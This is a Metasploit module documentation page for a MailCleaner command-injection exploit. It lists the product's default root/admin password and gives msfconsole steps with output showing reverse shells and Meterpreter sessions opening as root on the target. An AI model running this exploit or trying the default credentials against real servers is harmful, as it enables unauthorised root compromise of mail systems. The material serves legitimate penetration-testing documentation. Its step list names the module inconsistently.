ContextQMD
Back to Metasploit Framework

Mailcleaner Exec

documentation/modules/exploit/linux/http/mailcleaner_exec.md

6.4.1312.9 KB
Original Source

Description

This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.

Vulnerable Application

You can download ISO file from following URL. https://www.mailcleaner.org/latest-downloads/

At the time of this writing all the passwords of users such as root or admin user was "MCPassw0rd".

Verification Steps

A successful check of the exploit will look like this:

  1. Start msfconsole
  2. use use exploit/linux/http/mailcleaner
  3. Set RHOST
  4. Set LHOST
  5. Set USERNAME
  6. Set PASSWORD
  7. Run exploit
  8. Verify that you are seeing Awesome..! Authenticated.
  9. Verify that you are getting meterpreter session.

Scenarios

msf > use exploit/linux/http/mailcleaner_exec 
msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
RHOSTS => 12.0.0.100
msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin
USERNAME => admin
msf exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
PASSWORD => qwe123
msf exploit(linux/http/mailcleaner_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:<password>
[*] Exploiting command injection flaw
[*] Sending stage (53508 bytes) to 12.0.0.100
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.100:44974) at 2018-12-19 17:24:44 +0300
[*] Sending stage (53508 bytes) to 12.0.0.100
[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.100:44975) at 2018-12-19 17:24:45 +0300

meterpreter >

You can also use cmd payloads.

msf > use exploit/linux/http/mailcleaner_exec 
msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
RHOSTS => 12.0.0.100
msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin
USERNAME => admin
msf exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
msf exploit(linux/http/mailcleaner_exec) > set target 1
msf exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(linux/http/mailcleaner_exec) > run

[*] Started reverse TCP double handler on 12.0.0.1:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo P6zixt2asYXZ29NE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "P6zixt2asYXZ29NE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (12.0.0.1:4444 -> 12.0.0.100:53996) at 2018-12-20 12:09:32 +0300

id
uid=0(root) gid=1003(mailcleaner) groups=1003(mailcleaner)